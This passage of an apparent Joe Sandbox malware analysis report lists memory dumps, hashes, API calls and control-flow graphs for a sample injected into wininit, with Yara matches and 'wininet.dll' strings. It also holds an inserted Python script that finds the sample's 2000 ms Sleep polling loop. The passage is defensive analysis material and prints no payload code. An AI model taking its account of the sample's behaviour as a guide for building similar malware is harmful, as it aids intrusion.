                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                 • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                 • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                 • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                 • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                 • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 Control-flow Graph
                                                 • Blocks: 221 f7300-f732f; 222 f733b-f7342; 223 f7336 call fa020; 224 f741c-f7422; 225 f7348-f7398 call fa0f0 call e9b40 call f3e50; 232 f73a0-f73b1 Sleep; 233 f7416-f741a; 234 f73b3-f73b9; 235 f73bb-f73e1 call f6f30; 236 f73e3-f7403; 238 f7409-f740c; 239 f7404 call f7130
                                                 • Edges: 221->222; 221->223; 222->224; 222->225; 223->222; 225->232; 232->233; 232->234; 233->224; 233->232; 234->235; 234->236; 235->238; 236->238; 236->239; 238->233; 239->238
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 000F73A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: a39b82ecfbac99471acaa30ec38214f402b2a6bfa8d79c148fe129acb514d8ec
                                                • Instruction ID: 0e544456cb97406e62d9c7b5ce2fc2a4494cbba9dd5d9479baa22b162e9d43f5
                                                • Opcode Fuzzy Hash: a39b82ecfbac99471acaa30ec38214f402b2a6bfa8d79c148fe129acb514d8ec
                                                • Instruction Fuzzy Hash: F131ADB6601604ABC721DF64C8A1FABB7F8AF88700F00811DFA1D9B642D770B945DBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

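The graph for the function at 000F7300 above shows a block that calls Sleep and an edge that leads back to it, which is the shape of a polling loop rather than a one-shot delay. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the report's flattened control-flow-graph token stream, rebuilds blocks and edges, finds the cycle through the Sleep block, lists the edges that leave that cycle, and decodes the Sleep argument from the APIs line. The token grammar it assumes (a bare integer starts a block, the next token is its address range, `A->B` is an edge, anything else is a label) is inferred from the report's own lines; the embedded inputs are the f7300 graph and the `Sleep.KERNELBASE(000007D0)` line quoted from this section.

```python
"""Parse a Joe Sandbox control_flow_graph token stream and locate Sleep loops.

Added example; the token grammar is an assumption inferred from the report text.
"""
import re
from collections import defaultdict

# Token stream for the function at 000F7300, copied from the report above.
CFG_F7300 = (
    "221 f7300-f732f 222 f733b-f7342 221->222 223 f7336 call fa020 221->223 "
    "224 f741c-f7422 222->224 225 f7348-f7398 call fa0f0 call e9b40 call f3e50 "
    "222->225 223->222 232 f73a0-f73b1 Sleep 225->232 233 f7416-f741a 232->233 "
    "234 f73b3-f73b9 232->234 233->224 233->232 235 f73bb-f73e1 call f6f30 "
    "234->235 236 f73e3-f7403 234->236 238 f7409-f740c 235->238 236->238 "
    "239 f7404 call f7130 236->239 238->233 239->238"
)
# APIs line for the same function, copied from the report above.
SLEEP_LINE_F7300 = "Sleep.KERNELBASE(000007D0), ref: 000F73A8"

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_RE = re.compile(r"^(\d+)$")          # block ids are decimal integers
ADDR_RE = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")
SLEEP_RE = re.compile(r"Sleep\.\w+\(([0-9A-Fa-f]+)\)")


def parse_cfg(text):
    """Return (nodes, edges): nodes maps block id -> {'range', 'labels'},
    edges is a list of (src, dst). A decimal token opens a new block, the
    first address-like token after it is its range, and every other token
    (call targets, API names) is kept as a label on the current block.
    Assumption: an all-digit address would be mistaken for a block id; the
    report's addresses here all start with a hex letter, so this is safe."""
    nodes, edges, cur = {}, [], None
    for tok in text.split():
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            continue
        if NODE_RE.match(tok):
            cur = int(tok)
            nodes[cur] = {"range": None, "labels": []}
            continue
        if cur is None:
            raise ValueError("label before any block id: %r" % tok)
        if nodes[cur]["range"] is None and ADDR_RE.match(tok):
            nodes[cur]["range"] = tok
        else:
            nodes[cur]["labels"].append(tok)
    return nodes, edges


def _reach(start, adj):
    """Set of nodes reachable from start over adj (start itself only if on a cycle)."""
    seen, stack = set(), [start]
    while stack:
        for m in adj[stack.pop()]:
            if m not in seen:
                seen.add(m)
                stack.append(m)
    return seen


def sleep_loops(nodes, edges):
    """Map each Sleep block id to the set of blocks on a cycle through it.
    The loop body is the intersection of what the Sleep block can reach and
    what can reach it; a Sleep block with no path back to itself is omitted."""
    succ, pred = defaultdict(set), defaultdict(set)
    for a, b in edges:
        succ[a].add(b)
        pred[b].add(a)
    loops = {}
    for nid, info in nodes.items():
        if "Sleep" not in info["labels"]:
            continue
        fwd = _reach(nid, succ)
        if nid in fwd:                    # a back edge exists: this is a loop
            loops[nid] = fwd & _reach(nid, pred)
    return loops


def loop_exits(body, edges):
    """Edges that leave the loop body: the only ways the wait can end."""
    return sorted((a, b) for a, b in edges if a in body and b not in body)


def parse_sleep_ms(api_line):
    """Decode the hex Sleep argument printed in the report's APIs list."""
    m = SLEEP_RE.search(api_line)
    return int(m.group(1), 16) if m else None


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_F7300)
    for sleep_block, body in sleep_loops(nodes, edges).items():
        print("Sleep block %d (%s) loops over blocks %s"
              % (sleep_block, nodes[sleep_block]["range"], sorted(body)))
        print("  exits:", loop_exits(body, edges))
        print("  delay per iteration: %d ms" % parse_sleep_ms(SLEEP_LINE_F7300))
```

Run against the f7300 graph, the Sleep block (232) lies on a seven-block cycle that re-enters Sleep through 238->233->232 and has a single exit, 233->224, so the function sleeps 2000 ms per iteration until whatever block 233 tests becomes true. The same parser works on any of the other control_flow_graph lines in this report; functions whose Sleep block has no back edge are reported as having no loop.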
                                                 Control-flow Graph
                                                 • Blocks: 241 f72f6-f7342 call fa020; 244 f741c-f7422; 245 f7348-f7398 call fa0f0 call e9b40 call f3e50; 252 f73a0-f73b1 Sleep; 253 f7416-f741a; 254 f73b3-f73b9; 255 f73bb-f73e1 call f6f30; 256 f73e3-f7403; 258 f7409-f740c; 259 f7404 call f7130
                                                 • Edges: 241->244; 241->245; 245->252; 252->253; 252->254; 253->244; 253->252; 254->255; 254->256; 255->258; 256->258; 256->259; 258->253; 259->258
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 000F73A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: c23ba4bbd55b479bd2305550b5b3206460142f7904eccb94d46875295e1dfc80
                                                • Instruction ID: 282cfaccb460b74085fdfcdd4a0b6fad96d259b138c0a2d73c7b43b169d68853
                                                • Opcode Fuzzy Hash: c23ba4bbd55b479bd2305550b5b3206460142f7904eccb94d46875295e1dfc80
                                                • Instruction Fuzzy Hash: FD21C3B2605204ABC711DF64C8A1FABB7B4FF88700F00802DFA1DAB642E774A545DBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 Control-flow Graph
                                                 • Blocks: 267 f88f0-f8906; 268 f890c-f8921 RtlFreeHeap; 269 f8907 call f91e0
                                                 • Edges: 267->268; 267->269; 269->268
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000E3B93), ref: 000F891D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: ce23340cb5fe329eeb0fd674f18d3590397e251735bdedf0581a70d58f36fb4a
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: 8BE046B1200208ABDB18EF99CC49EE777ACEF88750F018558FE085B242C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 Control-flow Graph
                                                 • Blocks: 270 f88f2-f8907 call f91e0; 272 f890c-f8921 RtlFreeHeap
                                                 • Edges: 270->272
                                                APIs
